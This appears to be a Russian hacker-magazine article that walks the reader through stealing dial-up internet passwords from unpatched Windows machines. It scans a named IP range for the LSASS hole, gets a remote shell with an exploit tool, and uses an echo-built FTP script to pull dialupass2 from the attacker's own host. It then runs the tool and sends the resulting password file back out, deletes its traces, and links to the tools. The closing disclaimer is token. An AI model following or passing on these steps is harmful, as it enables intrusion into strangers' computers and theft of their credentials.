Предисловие 

В наше жестокое время становиться всё сложнее и сложнее добывать инет
- время легиона прошло, Net tools тоже не катит...
Но тут к нам в руки попал сплоит kaht2, использующий дыру winXP/2k RPC (Remoute Procedure Call), и
естественно в сеть выполз червь под всем известным именем Msblast , он же Lovesan.
Эта зараза перезагружала уязвимую систему через 60 сек
- естественно юзерам не понравилась эта шняга и все судорожно
начали набирать никому до тех пор незнакомую ссылку windowsupdate.microsoft.com
и качать патчи от этой бяки... Наконец вышла новая аналогичная уязвимость lsass процесса и
уже червь Sasser, но сплоит (LSA exploit) был довольно нестабильный
и особо одарённым было сложновато его юзать...
Сейчас я расскажу как упростить это дело и какой софт для этого нужен =). 

Начнём 

Для нашего злого дела нам нужно всего три (четыре, если считать FTP сервер) программки - сканер на уязвимые машины
– DSScan, очень полезная программулина SmallSoft Lsa Service
Exploit, к сожалению, я не знаю автора думаю, он меня простит 😉 (ссылки на весь нужный софт в конце статьи), и известная всем фриинетчикам прога dialupass2, показывающая все данные dialup (включая пароль).

Для охоты нам нужно выбрать диапазон IP адресов, возьмём мою любимую экву (57.66.158.1-57.66.158.255). В сканер Dsscan записываем Start IP 57.66.158.1 и End IP
57.66.158.255 - сканирование началось, внизу начали появляться Ip-шники, самый важный для нас столбец это “Status” – Not Vulnerable
означает, что система не пропатчена или профаерволена, VLNERABLE – значит система уязвима,
то что нам надо! 

Теперь нужно атаковать удалённый комп, открываем SmallSoft Lsa Service Exploit , в строку IP-адрес вставляем скопированный нами IP , шелл порт оставляем как есть, тип атаки выбираем «Шелл» и нажимает кнопочку «НАЧАТЬ» Должно появиться что-то вроде этого:

Если вы увидели это, то атака прошла успешно.
Спустя некоторое временя появиться ДОСовское окошко...
Кто юзал Kaht2 могут дальше не читать, а кто новичок в этом деле – читайте дальше.
Перед вами удалённая командная строка, теперь мы можем творить с этим компьютером всё, что захотим, но нам нужны пароли от dialup ... 

Для начала создайте папочку Temp на диске D:\ или на каком вам удобно и киньте туда файлик dialupass2.exe прежде переименовав его в
z.exe. Запускаем наш FTP сервер и заходим в раздел User Accounts.
Нажимаем кнопку add () и в появившемся окошке
вписываем имя пользователя (к примеру a) - нажимаем ok
- дальше нам необходимо выбрать папку откуда будут закачивается и выкачиваться файлы – это и есть папка Temp, где лежит наш z.exe.
Далее укажите пароль для этого пользователя
(к примеру тоже a =)), расставьте все стрелки, кроме Allow delete и нажмите кнопку Update. После всех проделанных действий необходимо потестить как оно работает или нет. Нажимаем в вверху зеленую кнопку и переходим в раздел Server Log, если написано: “FTP server started on port 21” , то всё сконфигурировано удачно. 

Теперь возвращаемся в удалённую командную строку и там пишем: 
Cd \ [переходим в корневую директорию]
echo open xxx.xxx.xxx.xxx>go&&echo a>>go&&echo a>>go [где xxx.xxx.xxx.xxx – это ваш IP, этой командой мы создаём на диске C:\ удалённой машины файл go – он нужен для подключения к вашему ftp серверу]
ftp –s:go [подключаемся к ftp]
Проконтролировать подключение можно по
логам FTP сервера. Ну и далее:

get z.exe

Этой командой мы закачали dialupass2 на удаленный компьютер. Теперь нам надо его запустить, пишем в
консоли:

bye [отключаем свой удаленный компьютер от вашего FTP сервера и переходим снова в консоль]
и 

Этим мы запускаем dialupass на удаленном компьютере и все содержимое отчета выводим в соответствующую папку и в файл ps.html. Теперь нам только осталась забрать файл ps.html.

ftp –s:go [опять подключаемся к ftp со сценарием, находящимся в файле go]
send ps.html [этой командой мы отправляем с удалённого компа к себе на ftp файл, созданный dialupass2]

Смотрим Server Log - должна пойти закачка. После того как файл закачается пишем:

bye
del go [Удаляем следы с удаленного компьютера]
del z.exe 
del ps.html 

Вот и все, теперь у тебя в папке FTP сервера лежит файл ps.html, в нем находятся Dialup пароли.

Ссылки на нужный софт : 

http://xarakiri.by.ru/Glob/pablos_ftp_server_v1_52.zip
http://xarakiri.by.ru/Glob/dialupass2.rar

http://www.securitylab.ru/tools/_services/download/?ID=45056

http://xakepy.ru/attachment.php?attachmentid=251

Заключение

Данная статья написана исключительно в ознакомительных целях, автор этой статьи
не несёт никакой ответственности за возможные последствия использования ее в целях, запрещенных Уголовным Кодексом Российской Федерации.

Check Also

В США задержали двух пентестеров, когда они физически вломились в здание суда

В здании суда округа Даллас были задержаны двое мужчин, которым грозят обвинения в проникн…

Оставить мнение